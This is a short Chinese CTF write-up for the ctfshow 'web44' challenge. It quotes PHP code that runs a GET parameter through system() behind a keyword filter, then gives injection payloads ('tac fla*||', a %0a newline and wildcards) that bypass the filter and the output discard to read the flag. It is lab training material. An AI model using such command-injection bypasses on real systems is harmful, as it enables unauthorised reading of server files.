当前位置: 首页 > news >正文

ctfshow web入门 web44

news 来源:原创 2025/5/2 7:38:31

信息收集

依旧是把所有输出丢弃,这一次多了flag的过滤,没啥好说的,用*或者?代替就可以了

if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/;|cat|flag/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

解题

依然是想办法给他后面的语句屏蔽了就行
||:短路,前面返回值为真后面就不会执行了
%0a:换行

ls||
tac fla*||
tac fla????? %0a

web43    目录    web45

相关文章:

  • 如何用AI生成生成个人简历
  • 2025深圳杯、东三省数学建模B题数模AI全网专业性第一
  • MATLAB R2024a安装教程
  • Python 常用内置函数详解(九):type()函数——获取对象类型或获取一个新的类型对象
  • 【Tool】vscode
  • Unity图片导入设置
  • d202551
  • [蓝桥杯 2023 国 Python B] 划分 Java
  • 【Unity】MVP框架的使用例子
  • Http详解
  • AI日报 · 2025年05月01日|DeepSeek 发布新一代定理证明模型 Prover V2
  • 【数据结构】 复杂度
  • 2025五一杯数学建模竞赛选题建议+初步分析
  • OpenGL-ES 学习(9) ---- OpenGL-ES 简介和基本 Pipeline
  • 专题二十一:无线局域网——WLAN
  • Python地图绘制模块cartopy入门
  • Java学习手册:Spring 数据访问
  • PostgreSQL数据类型
  • 面试中系统化地解答系统设计题:通用方法论
  • 向量数据库和关系型数据库的区别,优点,缺点和典型应用场景
  • 网红“丢那猩”丢石块闯祸,起哄游客难逃责任
  • 全国铁路昨日发送2311.9万人次,同比增长11.7%创历史新高
  • 贵州锦屏县委原书记舒健已任黔东南州政府办主任
  • 铁路上海站迎五一假期客流最高峰,今日预计发送77万人次
  • 中央网信办部署开展“清朗·整治AI技术滥用”专项行动
  • 安徽省公安厅原副厅长刘海石主动投案,正接受审查调查